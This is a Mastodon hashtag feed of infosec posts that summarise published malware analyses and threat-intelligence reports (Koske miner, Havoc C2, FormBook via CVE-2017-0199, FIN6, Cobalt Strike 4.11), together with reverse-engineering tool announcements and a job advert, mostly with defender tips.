MalwareLab<p>Analysis of <a href="https://infosec.exchange/tags/Koske" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Koske</span></a> <a href="https://infosec.exchange/tags/miner" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>miner</span></a>.</p><p>It is an AI-generated <a href="https://infosec.exchange/tags/Linux" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Linux</span></a> <a href="https://infosec.exchange/tags/malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malware</span></a> which was hidden in images with pandas. It supports wide variety of coinminers for various cryptocurrencies and for GPU and different CPU architectures. Its another component, <a href="https://infosec.exchange/tags/rootkit" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>rootkit</span></a> <a href="https://infosec.exchange/tags/hideproc" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>hideproc</span></a>, tries to hide the Koske miner from file listings and processes.</p><p><a href="https://malwarelab.eu/posts/koske-panda-ai/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">malwarelab.eu/posts/koske-pand</span><span class="invisible">a-ai/</span></a></p><p>Video from <a href="https://infosec.exchange/tags/anyrun" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>anyrun</span></a> analysis:</p><p><a href="https://www.youtube.com/watch?v=1OSPp996XQ4" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="">youtube.com/watch?v=1OSPp996XQ4</span><span class="invisible"></span></a></p><p><a href="https://infosec.exchange/tags/koskeminer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>koskeminer</span></a> <a href="https://infosec.exchange/tags/coinminer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>coinminer</span></a> <a href="https://infosec.exchange/tags/blueteam" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>blueteam</span></a> <a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cybersecurity</span></a> <a href="https://infosec.exchange/tags/dfir" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>dfir</span></a> <a href="https://infosec.exchange/tags/malwareanalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malwareanalysis</span></a> <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>infosec</span></a> <a href="https://infosec.exchange/tags/reverseengineering" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>reverseengineering</span></a></p>
photog.social is one of the many independent Mastodon servers you can use to participate in the fediverse.
A place for your photos and banter. Photog first is our motto
Please refer to the site rules before posting.
Administered by:
Server stats:
243active users
photog.social: About · Profiles directory · Privacy policy
Mastodon: About · Get the app · Keyboard shortcuts · View source code · v4.4.2
#malwareanalysis
0 posts · 0 participants · 0 posts today
k3ym𖺀<p><strong>Sliver too mainstream? Cobalt Strike too patched? Say hello to Havoc.</strong></p><p><span class="h-card" translate="no"><a href="https://infosec.exchange/@FortiGuardLabs" class="u-url mention" rel="nofollow noopener" target="_blank">@<span>FortiGuardLabs</span></a></span> just broke down a malicious Havoc C2 sample — and it’s bringing that open-source, post-exploitation energy with extra attitude.</p><p>Built for red teamers but abused by threat actors, this sample goes full dark mode:</p><ul><li>Shellcode loader in C++</li><li>AES-encrypted payload</li><li>XOR junk code to slow reverse engineering</li><li>Dynamic API resolving</li><li>LOLBin delivery via regsvr32</li></ul><p>It’s like someone asked: <em>“What if malware devs went full GitHub?”</em> (never go full GitHub)</p><p>🔗 Full breakdown:<br><a href="https://www.fortinet.com/blog/threat-research/dissecting-a-malicious-havoc-sample" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">fortinet.com/blog/threat-resea</span><span class="invisible">rch/dissecting-a-malicious-havoc-sample</span></a></p><p>TL;DR for blue teamers:</p><ul><li>Havoc ≠ harmless just because it’s open source</li><li>Monitor regsvr32, rundll32, mshta — Havoc loves its LOLBins</li><li>Watch for process injection + thread creation anomalies</li><li>Memory analysis > file-based detection here</li><li>Don’t assume your EDR is catching every beacon on port 443</li></ul><blockquote><p>Is it threat emulation or a real attack?</p></blockquote><p>— Blue teamer having a full-blown identity crisis at 2am</p><p>Shoutout to <span class="h-card" translate="no"><a href="https://mastodon.social/@xpzhang" class="u-url mention" rel="nofollow noopener" target="_blank">@<span>xpzhang</span></a></span> and team for their amazing work!</p><p><a href="https://infosec.exchange/tags/ThreatIntel" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ThreatIntel</span></a> <a href="https://infosec.exchange/tags/MalwareAnalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MalwareAnalysis</span></a> <a href="https://infosec.exchange/tags/HavocC2" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>HavocC2</span></a> <a href="https://infosec.exchange/tags/RedTeamTools" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>RedTeamTools</span></a> <a href="https://infosec.exchange/tags/PostExploitation" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>PostExploitation</span></a> <a href="https://infosec.exchange/tags/Infosec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Infosec</span></a> <a href="https://infosec.exchange/tags/BlueTeam" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>BlueTeam</span></a> <a href="https://infosec.exchange/tags/ReverseEngineering" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ReverseEngineering</span></a> <a href="https://infosec.exchange/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurity</span></a></p>
k3ym𖺀<p><strong>No PE header? No problem.</strong></p><p><span class="h-card" translate="no"><a href="https://infosec.exchange/@FortiGuardLabs" class="u-url mention" rel="nofollow noopener" target="_blank">@<span>FortiGuardLabs</span></a></span> dropped a deep dive into a malware sample dumped without a PE header — like a cybercriminal rage-quit halfway through packing their payload.</p><p>You ever load a binary in IDA and think, “Am I being punk’d?”<br>Yeah, it’s one of those samples.</p><p>This sample:</p><ul><li><p>Reconstructs its own PE structure at runtime</p></li><li><p>Hides config data in obfuscated blobs</p></li><li><p>Uses anti-sandbox tricks to avoid analysis</p></li><li><p>Drops yet another info-stealer, because originality is dead</p></li></ul><p>It’s engineered to break basic static analysis and dodge sandboxes like it’s speedrunning DEFCON CTF.</p><p>🔗 Full breakdown:<br><a href="https://www.fortinet.com/blog/threat-research/deep-dive-into-a-dumped-malware-without-a-pe-header" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">fortinet.com/blog/threat-resea</span><span class="invisible">rch/deep-dive-into-a-dumped-malware-without-a-pe-header</span></a></p><p>TL;DR for blue teamers:</p><ul><li><p>Static AV signatures won’t help here</p></li><li><p>Watch for suspicious memory allocations + hollowing patterns</p></li><li><p>Endpoint heuristics > file-based detection</p></li><li><p>Log your PowerShell and LOLBins — this thing probably brings friends</p></li><li><p>If your EDR cries when it sees raw shellcode, maybe give it a hug</p></li></ul><p><a href="https://infosec.exchange/tags/ThreatIntel" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ThreatIntel</span></a> <a href="https://infosec.exchange/tags/MalwareAnalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MalwareAnalysis</span></a> <a href="https://infosec.exchange/tags/ReverseEngineering" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ReverseEngineering</span></a> <a href="https://infosec.exchange/tags/Infosec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Infosec</span></a> <a href="https://infosec.exchange/tags/PEFilesAreSo2020" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>PEFilesAreSo2020</span></a> <a href="https://infosec.exchange/tags/EDREvasion" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>EDREvasion</span></a> <a href="https://infosec.exchange/tags/LOLbins" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LOLbins</span></a> <a href="https://infosec.exchange/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurity</span></a> <a href="https://infosec.exchange/tags/BlueTeam" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>BlueTeam</span></a></p>
k3ym𖺀<p>🚨 0-day vibes from 2017? Yup, it’s still happening.</p><p>A malicious Excel file using CVE-2017-0199 is out here in 2025 dropping FormBook like it's a fresh mixtape. </p><p>The attack chain?</p><ul><li>Macro-free Excel</li><li>Weaponized with remote .hta</li><li>Payload: Info-stealer FormBook</li></ul><p>Despite being 7+ years old, this vuln still slaps in phishing campaigns — because patching is apparently a myth.</p><p>Full technical breakdown by <span class="h-card" translate="no"><a href="https://infosec.exchange/@FortiGuardLabs" class="u-url mention" rel="nofollow noopener" target="_blank">@<span>FortiGuardLabs</span></a></span>: <a href="https://www.fortinet.com/blog/threat-research/how-a-malicious-excel-file-cve-2017-0199-delivers-the-formbook-payload" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">fortinet.com/blog/threat-resea</span><span class="invisible">rch/how-a-malicious-excel-file-cve-2017-0199-delivers-the-formbook-payload</span></a></p><p>TL;DR for blue teamers:</p><ul><li>Watch your egress traffic</li><li>Harden Office apps</li><li>Monitor LOLBins (Living Off the Land Binaries)</li><li>Block outbound to shady IPs faster than your memes go viral</li></ul><p>Don’t let your org get dunked on by a 2017 CVE in 2025. That’s not a good look. </p><p><a href="https://infosec.exchange/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurity</span></a> <a href="https://infosec.exchange/tags/ThreatIntel" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ThreatIntel</span></a> <a href="https://infosec.exchange/tags/FormBook" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>FormBook</span></a> <a href="https://infosec.exchange/tags/CVE20170199" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CVE20170199</span></a> <a href="https://infosec.exchange/tags/Infosec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Infosec</span></a> <a href="https://infosec.exchange/tags/BlueTeam" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>BlueTeam</span></a> <a href="https://infosec.exchange/tags/MalwareAnalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MalwareAnalysis</span></a> <a href="https://infosec.exchange/tags/HackerNews" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>HackerNews</span></a> <a href="https://infosec.exchange/tags/Phishing" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Phishing</span></a></p>
SecuritySnacks<p>Cybercrime group FIN6 (aka Skeleton Spider) is leveraging trusted cloud services like AWS to deliver malware through fake job applications.</p><p>Our latest analysis breaks down: <br>🔹 How attackers use LinkedIn & Indeed to build trust<br>🔹 The use of resume-themed phishing lures<br>🔹 Cloud-hosted infrastructure that evades detection<br>🔹 The delivery of the More_eggs backdoor via .LNK files<br>🔹 Key defense strategies for recruiters and security teams</p><p>This campaign is a masterclass in low-complexity, high-evasion phishing</p><p>📖 Read the full breakdown: <a href="https://dti.domaintools.com/skeleton-spider-trusted-cloud-malware-delivery/?utm_source=Mastodon&utm_medium=Social&utm_campaign=Skeleton-Spider" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">dti.domaintools.com/skeleton-s</span><span class="invisible">pider-trusted-cloud-malware-delivery/?utm_source=Mastodon&utm_medium=Social&utm_campaign=Skeleton-Spider</span></a></p><p><a href="https://infosec.exchange/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurity</span></a> <a href="https://infosec.exchange/tags/ThreatIntel" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ThreatIntel</span></a> <a href="https://infosec.exchange/tags/FIN6" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>FIN6</span></a> <a href="https://infosec.exchange/tags/Phishing" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Phishing</span></a> <a href="https://infosec.exchange/tags/CloudSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CloudSecurity</span></a> <a href="https://infosec.exchange/tags/MalwareAnalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MalwareAnalysis</span></a> <a href="https://infosec.exchange/tags/InfoSec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>InfoSec</span></a> <a href="https://infosec.exchange/tags/SkeletonSpider" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SkeletonSpider</span></a></p>
Brian Greenberg :verified:<p>🖥️ A new Windows-based Remote Access Trojan (RAT) has been exposed — and it’s unusually stealthy.</p><p>👉 It corrupts critical DOS + PE headers, making it difficult to analyze or reconstruct.<br>👉 It embeds inside dllhost.exe, communicates via encrypted C2, and runs multi-threaded client sessions.<br>👉 Researchers at Fortinet had to replicate the compromised system’s environment to finally analyze it.</p><p>🚨 This attack highlights how adversaries are evolving to evade both detection and reverse engineering.<br>⚠️ Organizations should ensure endpoint monitoring can catch process anomalies — not just file signatures.</p><p><a href="https://infosec.exchange/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurity</span></a> 🛡️ <a href="https://infosec.exchange/tags/MalwareAnalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MalwareAnalysis</span></a> 🔍 <a href="https://infosec.exchange/tags/WindowsSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>WindowsSecurity</span></a> 💻 <a href="https://infosec.exchange/tags/ThreatIntel" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ThreatIntel</span></a> 🌐<br><a href="https://thehackernews.com/2025/05/new-windows-rat-evades-detection-for.html" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">thehackernews.com/2025/05/new-</span><span class="invisible">windows-rat-evades-detection-for.html</span></a></p>
SecuritySnacks<p>🔥 Hot off the presses!</p><p>DomainTools Investigations shares that a spoofed antivirus download page is delivering VenomRAT, StormKitty, and SilentTrinity—a powerful combo for credential theft, persistence, and long-term access.</p><p>🔎 We traced the infrastructure, payloads, and attacker tactics.</p><p>Full breakdown: <a href="https://dti.domaintools.com/venomrat/?utm_source=Mastodon&utm_medium=Social&utm_campaign=VenomRAT" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">dti.domaintools.com/venomrat/?</span><span class="invisible">utm_source=Mastodon&utm_medium=Social&utm_campaign=VenomRAT</span></a></p><p><a href="https://infosec.exchange/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurity</span></a> <a href="https://infosec.exchange/tags/ThreatIntel" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ThreatIntel</span></a> <a href="https://infosec.exchange/tags/MalwareAnalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MalwareAnalysis</span></a> <a href="https://infosec.exchange/tags/Infosec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Infosec</span></a></p>
Cindʎ Xiao 🍉<p><span class="h-card" translate="no"><a href="https://infosec.exchange/@REverseConf" class="u-url mention" rel="nofollow noopener" target="_blank">@<span>REverseConf</span></a></span> If you ever need to find both the talk video and the slides again, they are collected in one place on my site and on GitHub, for your convenient bookmarking:</p><p><a href="https://cxiao.net/posts/2025-02-28-reconstructing-rust-types-re-verse-2025/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">cxiao.net/posts/2025-02-28-rec</span><span class="invisible">onstructing-rust-types-re-verse-2025/</span></a><br><a href="https://github.com/cxiao/reconstructing-rust-types-talk-re-verse-2025/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">github.com/cxiao/reconstructin</span><span class="invisible">g-rust-types-talk-re-verse-2025/</span></a></p><p><a href="https://infosec.exchange/tags/rust" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>rust</span></a> <a href="https://infosec.exchange/tags/rustlang" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>rustlang</span></a> <a href="https://infosec.exchange/tags/ReverseEngineering" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ReverseEngineering</span></a> <a href="https://infosec.exchange/tags/reversing" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>reversing</span></a> <a href="https://infosec.exchange/tags/malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malware</span></a> <a href="https://infosec.exchange/tags/MalwareAnalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MalwareAnalysis</span></a> <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>infosec</span></a></p>
Cindʎ Xiao 🍉<p><span class="h-card" translate="no"><a href="https://infosec.exchange/@REverseConf" class="u-url mention" rel="nofollow noopener" target="_blank">@<span>REverseConf</span></a></span> The slides for "Reconstructing Rust Types: A Practical Guide for Reverse Engineers" are also available! There is a convenient single-page HTML version if you want to use the material in the presentation as a reference, for your own reversing!</p><p><a href="https://cxiao.net/posts/2025-02-28-reconstructing-rust-types-re-verse-2025/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">cxiao.net/posts/2025-02-28-rec</span><span class="invisible">onstructing-rust-types-re-verse-2025/</span></a><br><a href="https://github.com/cxiao/reconstructing-rust-types-talk-re-verse-2025/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">github.com/cxiao/reconstructin</span><span class="invisible">g-rust-types-talk-re-verse-2025/</span></a></p><p><a href="https://infosec.exchange/tags/rust" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>rust</span></a> <a href="https://infosec.exchange/tags/rustlang" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>rustlang</span></a> <a href="https://infosec.exchange/tags/ReverseEngineering" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ReverseEngineering</span></a> <a href="https://infosec.exchange/tags/reversing" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>reversing</span></a> <a href="https://infosec.exchange/tags/malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malware</span></a> <a href="https://infosec.exchange/tags/MalwareAnalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MalwareAnalysis</span></a> <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>infosec</span></a></p>
Cindʎ Xiao 🍉<p>Hi Rust reversing fans - the recording of my talk at <span class="h-card" translate="no"><a href="https://infosec.exchange/@REverseConf" class="u-url mention" rel="nofollow noopener" target="_blank">@<span>REverseConf</span></a></span>: Reconstructing Rust Types: A Practical Guide for Reverse Engineers, is available for you to watch!</p><p><a href="https://www.youtube.com/watch?v=SGLX7g2a-gw" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="">youtube.com/watch?v=SGLX7g2a-gw</span><span class="invisible"></span></a></p><p><a href="https://infosec.exchange/tags/rust" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>rust</span></a> <a href="https://infosec.exchange/tags/rustlang" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>rustlang</span></a> <a href="https://infosec.exchange/tags/ReverseEngineering" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ReverseEngineering</span></a> <a href="https://infosec.exchange/tags/reversing" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>reversing</span></a> <a href="https://infosec.exchange/tags/malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malware</span></a> <a href="https://infosec.exchange/tags/MalwareAnalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MalwareAnalysis</span></a> <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>infosec</span></a></p>
nearshorecyber<p>Our Houston-based client is looking for a 👉 𝗿𝗲𝗺𝗼𝘁𝗲 👈 (must be in Mexico) Senior Email Security Analyst with experience with Abnormal Security or a similar email security platform. If you're interested, please apply in English :</p><p><a href="https://recruiterflow.com/nsc/jobs/38" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="">recruiterflow.com/nsc/jobs/38</span><span class="invisible"></span></a> </p><p><a href="https://infosec.exchange/tags/Remote" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Remote</span></a> <a href="https://infosec.exchange/tags/WFH" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>WFH</span></a> <a href="https://infosec.exchange/tags/Mexico" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Mexico</span></a> <a href="https://infosec.exchange/tags/EmailSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>EmailSecurity</span></a> <a href="https://infosec.exchange/tags/AbnormalSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>AbnormalSecurity</span></a> <a href="https://infosec.exchange/tags/MalwareAnalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MalwareAnalysis</span></a> <a href="https://infosec.exchange/tags/Phishing" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Phishing</span></a> <a href="https://infosec.exchange/tags/Nearshore" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Nearshore</span></a> <a href="https://infosec.exchange/tags/CybersecurityJobs" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CybersecurityJobs</span></a></p>
Anonymous 🐈️🐾☕🍵🏴🇵🇸 :af:<p>Experts report that a new social engineering technique is using ClickFix Captcha to deliver malware like Quakbot, effectively bypassing traditional security measures and posing a significant threat. <a href="https://kolektiva.social/tags/MalwareAnalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MalwareAnalysis</span></a> <a href="https://kolektiva.social/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurity</span></a> <a href="https://darkatlas.io/blog/delivering-trojans-via-clickfix-captcha" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">darkatlas.io/blog/delivering-t</span><span class="invisible">rojans-via-clickfix-captcha</span></a></p>
Volexity :verified:<p>In the course of its investigations, <span class="h-card" translate="no"><a href="https://infosec.exchange/@volexity" class="u-url mention" rel="nofollow noopener" target="_blank">@<span>volexity</span></a></span> frequently encounters malware samples written in Golang. This reflects the increase in popularity of the Golang generally, and presents challenges to reverse engineering tools.<br> <br>Today, <span class="h-card" translate="no"><a href="https://infosec.exchange/@volexity" class="u-url mention" rel="nofollow noopener" target="_blank">@<span>volexity</span></a></span> is releasing GoResolver, open-source tooling to help reverse engineers understand obfuscated samples. <span class="h-card" translate="no"><a href="https://infosec.exchange/@r00tbsd" class="u-url mention" rel="nofollow noopener" target="_blank">@<span>r00tbsd</span></a></span> & Killian Raimbaud presented details at INCYBER Forum earlier today.<br> <br>GoResolver uses control-flow graph similarity to identify library code in obfuscated code, leaving analysts with only malware functions to analyze. This saves time & speeds up investigations!<br> <br>Check out the blog post on how GoResolver works and where to download it: <a href="https://www.volexity.com/blog/2025/04/01/goresolver-using-control-flow-graph-similarity-to-deobfuscate-golang-binaries-automatically/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">volexity.com/blog/2025/04/01/g</span><span class="invisible">oresolver-using-control-flow-graph-similarity-to-deobfuscate-golang-binaries-automatically/</span></a><br> <br><a href="https://infosec.exchange/tags/dfir" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>dfir</span></a> <a href="https://infosec.exchange/tags/reversing" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>reversing</span></a> <a href="https://infosec.exchange/tags/malwareanalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malwareanalysis</span></a></p>
Sajid Nawaz Khan :donor:<p>For hobbyist Cobalt Strike Beacon collectors, note that the recently announced 4.11 update introduces a number of changes to frustrate Beacon configuration extraction, namely through the new `transform-obfuscate` field.</p><p>When set, this field can apply multiple layers of encoding, encryption and compression (with some recent Beacons observed with a 32 byte XOR key, configurable upto 2048 bytes!).</p><p>While still reasonably trivial to decode manually, standard automated workflows (say, through the SentinelOne parser) will now fail, not least because of changes to the well-known field markers.</p><p>Beacons with these characteristics have thus far been observed with watermarks indicative of licensed instances, though I imagine it is only a matter of time before the 4.11 capabilities become accessible to all manner of miscreants.</p><p>A sample configuration, via a staged Beacon on 104.42.26[.]200 is attached, including the three distinct XOR keys used to decode it.</p><p><a href="https://www.cobaltstrike.com/blog/cobalt-strike-411-shh-beacon-is-sleeping" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">cobaltstrike.com/blog/cobalt-s</span><span class="invisible">trike-411-shh-beacon-is-sleeping</span></a></p><p><a href="https://infosec.exchange/tags/cobaltstrike" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cobaltstrike</span></a> <a href="https://infosec.exchange/tags/malwareanalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malwareanalysis</span></a> <a href="https://infosec.exchange/tags/forensics" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>forensics</span></a> <a href="https://infosec.exchange/tags/blueteam" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>blueteam</span></a></p>
MalwareLab<p>I saw a demo of <a href="https://infosec.exchange/tags/StratoShark" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>StratoShark</span></a> at SharkFest in November. It will be useful addition to <a href="https://infosec.exchange/tags/malwareanalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malwareanalysis</span></a> toolkit. <br>Imagine <a href="https://infosec.exchange/tags/procmon" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>procmon</span></a> and <a href="https://infosec.exchange/tags/apimonitor" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>apimonitor</span></a> (or strace/ltrace) with user interface of <a href="https://infosec.exchange/tags/wireshark" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>wireshark</span></a>, including support for powerful wireshark display filters. </p><p><a href="https://infosec.exchange/tags/blueteam" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>blueteam</span></a> <a href="https://infosec.exchange/tags/dfir" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>dfir</span></a> <a href="https://infosec.exchange/tags/sf24eu" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>sf24eu</span></a> <span class="h-card" translate="no"><a href="https://ioc.exchange/@wireshark" class="u-url mention" rel="nofollow noopener" target="_blank">@<span>wireshark</span></a></span> <span class="h-card" translate="no"><a href="https://infosec.exchange/@geraldcombs" class="u-url mention" rel="nofollow noopener" target="_blank">@<span>geraldcombs</span></a></span> </p><p>RE: <a href="https://infosec.exchange/@geraldcombs/113680686165407123" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">infosec.exchange/@geraldcombs/</span><span class="invisible">113680686165407123</span></a></p>
Thomas Roccia :verified:<p>🎁 GenAI x Sec Advent #18</p><p>I’ve built a PCAP analyzer with GenAI—let me explain! 👇</p><p>PCAP analysis can be quite tricky, especially if you’re not familiar with the protocols or aren’t sure what to search for. To simplify this, I created a tool that processes PCAP data and passes it into an Embedding.</p><p>Yes, I used a RAG. 😏</p><p>But I used something else too! 😉</p><p>I wanted to introduce you to another concept—HYDE or Hypothetical Document Embeddings.</p><p>HYDE improves RAG when queries are complex, data are noisy, or patterns are subtle—just like... a PCAP!</p><p>HYDE will generate hypothetical insights based on the user’s query (e.g., “What anomalies exist in this traffic?”). Using Hypothetical Document Embeddings, the tool expands your query into a contextual document that captures the intent, to retrieve more relevant packets and patterns! 🤔</p><p>👉 Think of this way: you are in a library searching for "AI in cybersecurity". Instead of an exact title, you describe what you need (a hypothetical document). The librarian finds books matching your description, even if the keywords don’t align. You get the idea? 🤯</p><p>That’s exactly what HYDE does for your queries. It expands the context and meaning, to make your retrieval smarter and more precise.</p><p>Have a look to the output below there is a HUGE difference between the RAG with HYDE and the one without! 😎</p><p>Follow along—I’ll share the code tomorrow as I want to explain something else! 🫡</p><p>➡️ HYDE Paper: <a href="https://arxiv.org/pdf/2212.10496" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="">arxiv.org/pdf/2212.10496</span><span class="invisible"></span></a></p><p><a href="https://infosec.exchange/tags/genai" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>genai</span></a> <a href="https://infosec.exchange/tags/malwareanalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malwareanalysis</span></a> <a href="https://infosec.exchange/tags/pcap" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>pcap</span></a> <a href="https://infosec.exchange/tags/network" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>network</span></a> <a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cybersecurity</span></a></p>
